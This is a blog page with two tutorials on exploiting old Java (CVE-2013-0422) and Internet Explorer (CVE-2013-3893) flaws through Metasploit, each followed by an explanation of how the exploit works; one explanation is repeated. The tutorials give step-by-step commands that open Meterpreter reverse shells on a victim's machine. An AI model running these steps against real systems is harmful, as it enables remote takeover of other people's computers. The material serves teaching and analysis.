Showing posts with label analysing. Show all posts
Showing posts with label analysing. Show all posts
Thursday, September 21, 2017
Exploiting and Analysing CVE 2013 0422
Exploiting and Analysing CVE 2013 0422
The topic of this post will be a vulnerability in Oracle Java 7, updates 10 and older, that has been labeled as CVE-2013-0422. It was announced by Oracle in January 2013 in a security alert and the fix for the vulnerability apparently resulted in the default Java Security Level being upgraded from Medium to High. If the vulnerability is exploited, it enables the attackers to gain full control of the victims machine without permission.
The vulnerability lies in JmxMBeanServer class in Java. Just like most vulnerabilities related to Java, exploiting it allows attackers to run Java code outside the Java sandbox.
Testing the exploit
In order to test the exploit well be using the Metasploit Pentesting tool which already contains an exploit that uses this vulnerability.Before starting the metasploit console you should make sure that the targeted computer meets the requirements needed to successfully perform the exploit. This exploit requires the victim machine to have Java 7 Update 10 or older. In this tutorial Ill be using the Update 9 version of Java 7. You can find older versions of Java on Oracles site.
Once youve installed the correct version of Java 7 initiate Metasploit. The exploit we need to use is java_jre17_jmxbean and in order to set it as our exploit we type set exploit/multi/browser/java_jre17_jmxbean.
The next step is finding a suitable payload that we want to drop into the target machine. To see all the payloads we can use with this exploit we use the show payloads command.
As we can see in the picture above, this exploit is compatible with a small number of payloads. Our goal is to input commands with the Meterpreter tool so type set payload java/meterpreter/reverse_tcp into the console. Once we have chosen our payload we use the show options command in order to see what other parameters we need to set.
You can notice that the LHOST parameter is required but isnt set. To configure it type set LHOST [ip address of your machine]. You can also change the SRVHOST parameter to match your ip address by using the same set command.
When youre ready to start the exploit type exploit into the console. Soon after that Metasploit will provide you with the URL you have to use to perform the exploit.
When this URL is opened by the target machine Metasploit will start exploiting it. If the exploit is successful you will see something like this:
I used the sessions command afterwards to confirm that I have successfully started the session and to see the Id of the session because I will need it for the next command.
Type sessions -i [session Id] to start interacting with the target machine. After that you can use the Meterpreter tool to control the victims computer.
The Analysis
When the target opens the provided link all we can see from the victims perspective is a "Loading, Please Wait..." page.
If we use the Process Explorer application on the victims computer we will notice that java.exe is initiated in the browser after the link is opened. It is executing the malicious code which later on gives the attacker control over the targeted machine.
You can see in the exploits code below that the HTML page was edited to look like its always loading. This part of the exploit isnt mandatory and is actually a diversion added in order to reduce the chances of the page being closed prematurely.
The actual exploit is called in the part of the code seen below.
The java_jre17_jmxbean exploit relies on these two Java class files and we can study them more thoroughly by using the JD-GUI program or the JD-Eclipse plugin.
First thing we notice in the code of Exploit.class is that a JmxMBeanServerBuilder is used to create a com.sun.jmx.mbeanserver.JmxMBeanServer instance. After that a method in that instance, called getMBeanInstatiator, is used to create a com.sun.jmx.mbeanserver.JmxMBeanInstator instance. In other words, we have to use the public JmxMBeanServer to crate a JmxMBeanInstatiator instance since it is private.
MBeanInstator object contains the findClass method which is crucial for this exploit.
Once it is called, the findClass method will call the loadClass method which will give us the reference of any class in any package.
As a result of these actions, we are able to retrieve even restricted classes. If we continue examining the Exploit Java class we will see that the attackers used this method to get the sun.org.mozilla.javascript.internal.Context class and the sun.org.mozilla.javascript.internal.GeneratedClassLoader class.
Afterwards the constructor methods for these classes are called in order to create their instances. The Context instances createClassLoader method is invoked and it enables the defineClassMethod in GeneratedClassLoader instance to define and call any class that will, once executed, disable the Java security checks. That malicious class is the B.class, the second file that was loaded by Metasploit.
To sum up, the exploit relies on avoiding Javas restrictions and being able to call methods which you shouldnt be able to call. In Java exploits, getting out of the sandbox is the main objective. Oracle is trying to counter this by improving security checks when methods are executed and of course by trying to make sure that those methods have less flaws which can lead to vulnerabilities.
If we use the Process Explorer application on the victims computer we will notice that java.exe is initiated in the browser after the link is opened. It is executing the malicious code which later on gives the attacker control over the targeted machine.
You can see in the exploits code below that the HTML page was edited to look like its always loading. This part of the exploit isnt mandatory and is actually a diversion added in order to reduce the chances of the page being closed prematurely.
The actual exploit is called in the part of the code seen below.
The java_jre17_jmxbean exploit relies on these two Java class files and we can study them more thoroughly by using the JD-GUI program or the JD-Eclipse plugin.
First thing we notice in the code of Exploit.class is that a JmxMBeanServerBuilder is used to create a com.sun.jmx.mbeanserver.JmxMBeanServer instance. After that a method in that instance, called getMBeanInstatiator, is used to create a com.sun.jmx.mbeanserver.JmxMBeanInstator instance. In other words, we have to use the public JmxMBeanServer to crate a JmxMBeanInstatiator instance since it is private.
MBeanInstator object contains the findClass method which is crucial for this exploit.
Once it is called, the findClass method will call the loadClass method which will give us the reference of any class in any package.
As a result of these actions, we are able to retrieve even restricted classes. If we continue examining the Exploit Java class we will see that the attackers used this method to get the sun.org.mozilla.javascript.internal.Context class and the sun.org.mozilla.javascript.internal.GeneratedClassLoader class.
Afterwards the constructor methods for these classes are called in order to create their instances. The Context instances createClassLoader method is invoked and it enables the defineClassMethod in GeneratedClassLoader instance to define and call any class that will, once executed, disable the Java security checks. That malicious class is the B.class, the second file that was loaded by Metasploit.
To sum up, the exploit relies on avoiding Javas restrictions and being able to call methods which you shouldnt be able to call. In Java exploits, getting out of the sandbox is the main objective. Oracle is trying to counter this by improving security checks when methods are executed and of course by trying to make sure that those methods have less flaws which can lead to vulnerabilities.
download file now
Friday, September 8, 2017
Exploiting and Analysing CVE 2013 3893
Exploiting and Analysing CVE 2013 3893
On September 17, 2013 Microsoft Security Center announced a Security Advisory about a new zero-day vulnerability that has been spotted attacking Japanese financial companies. On October 8 they expanded that advisory with MS13-080, a bulletin containing information about an update that fixes the vulnerability that was exploited. The vulnerability was labeled CVE-2013-3893. Its an use-after-free vulnerability found in Internet Explorers dynamic link library mshtml.dll, in the SetMouseCapture functionality, and it allows remote code execution if exploited properly. The exploit was targeting at Internet Explorer 6 through 11 that ran on Windows XP or Windows 7 which also had Microsoft Office 2007 or Microsoft Office 2010 installed.
The term use-after-free bug in this case means that by accessing a web page with malicious code the Internet Explorer can be manipulated into allocating memory and then freeing it, even though it is still referenced. The freed memory can then be controlled by the attacker. When Internet Explorer executes commands from that memory there is a possibility that it will execute instructions created by the attacker. This bug usually results in corruption of data and the program just crashes, but if it is used by a hacker it may allow him to gain complete control of the system.
Another term we should highlight is remote code execution. It is associated with CVE-2013-3893 because the exploit allowed attackers to control the victim computers over the network. The victim only has to open the link with the malicious page and the attacker will instantly have control of the victims computer and access to his memory.
The vulnerability also implies that Microsoft Office 2007 or 2010 is installed because it contains hxds.dll module which isnt compatible with ASLR and can be used to bypass it.
Exploiting with Metasploit
This section is going to be a simple tutorial on how to use Metasploit to exploit this vulnerability. The tutorial is for beginners and readers who have never used Metasploit before and basically no programing skills are required to perform this exploit.First off, we should define some basic requirements that have to be met in order to preform a successful attack. The Metasploit exploit is a bit more restricted than the original exploit. The computer you wish to attack has to have Internet Explorer 9 running on Windows 7 and also has to have Office 7 or Office 10 installed.
If you havent already, you should download the free Metasploit Community edition here. Keep in mind that you should turn off both your antivirus and firewall while using Metasploit.
When you are done with the update then start your Metasploit Console and wait a bit for it to initialize. If you get confused or dont know what command to use at some point then just type help into the console and you will see a list of commands that you can use along with their explanations.
To start off, type use exploit/windows/browser/ie_setmousecapture_uaf in order to define that youre using the IE setmousecapture exploit. When you dont know the name of the exploit you can use the search command. For example, I found this exploit by typing search setmouse into the console:
Once youve set your exploit you should choose a payload that will be dropped into the vulnerable computer. To see a list of compatible payloads type show payloads into the console. Once youve found a suitable payload you can use the set command in order to select it. In this tutorial my aim is to be able to input commands with the Meterpreter tool so Ive typed in set payload windows/meterpreter/reverse_tcp.
For all additional exploit and payload options you can type in show options and you will see something like this:
For this particular payload we have to define the LHOST (the local hosts address) so we will type in set LHOST [ip address of your machine]. If you dont know your ip address then just use ipconfig. You should also redefine the SRVHOST by typing in set SRVHOST [ip address of your machine].
If you just want to test the exploit and dont care about gaining access to the shell on the victims machine you can use the windows/messagebox payload which will result in a message box appearing on the victims machine. You can also use the windows/download_exec payload to put an executable file on the targeted machine.
Once youre ready to start your exploit just type in exploit. If you have done everything correctly you will see this in your console:
When the exploit starts you will be given an URL address. Retype that address into the Internet Explorer address bar and Metasploit is going to begin attacking it. You should shortly after receive a message that a session has been opened. If you want to check to see which sessions you have opened type in sessions.
After that you just have to type in sessions -i 1 to start interacting with the victims shell.
You can now use Meterpreter to control the victims computer and inspect their data. You can see a list of commands you can use in Meterpreter on this link.
If your exploit isnt working properly there are a few things should check. First of, make sure your victims system meets all of the requirements. You should also make sure youre using IE9 32-bit version and not IE9 64-bit version. If the console is telling you that youre using the wrong browser even though youre using IE9 32-bit you should check if the Internet Explorer is running the page in IE7 compatibility mode. You can check that by clicking Tools in the Menu Bar and then selecting Compatibility View settings. If that is the case just remove the page from the compatibility list.
Analysing the Vulnerability and the Exploit
The best way to analyse an exploit is to use a debugger. The most frequently used debugger in pentesting is IDA Pro. It can help us figure out how the exploit actually works and how it affects the memory.The vulnerability lies in the setmousecapture() function of the Internet Explorer which is usually used to take control over mouse actions in the browser. The exploit creates two elements on the malicious page, one parent and one child element, and then makes an onclosecapture() event for the parent element that involves a document.write() function. When the setCapture() function for the child element is called it will trigger an event, which will result in an arbitrary memory release by using the document.write() function.
The memory that was used by the document.write() function will stay referenced and it will later be passed on to mshtml.dll resulting in IE9 crashing in mshtml.dll, due to incorrect memory reading.
This incorrect memory call is the basis of the exploit because the attackers can now make our system call a memory address controlled by them. However, ASLR and DEP make it hard to manipulate memory and call malicious functions.
One way ASLR can be bypassed is heap spraying. It allows the attackers to fill large chunks of memory with their data and increases the chance that their code will be initiated.
Another problem the hackers had to address is that Windows 7 wont execute code if they are located in the part of memory marked NX (no execute). Furthermore, because of ASLR, they dont know which segments of memory are currently used and are marked as executable.
This problem is bypassed by using the hxds.dll (a part of Microsoft Office) which isnt compatible with ASLR. Since it isnt in a random part of our memory the attackers can easily locate it and they can also easily make IE start it.
Conclusion
As we can see this exploit uses multiple vulnerable applications on Windows. By combining the bug in IEs mshtml.dll with hxds.dlls incompatibility with ASLR the attackers managed to gain complete access to the victims system.This example shows us how a few seemingly harmless bugs can be combined and exploited by resourceful hackers and how imaginative hackers really are when it comes to exploits.
download file now
Subscribe to:
Posts (Atom)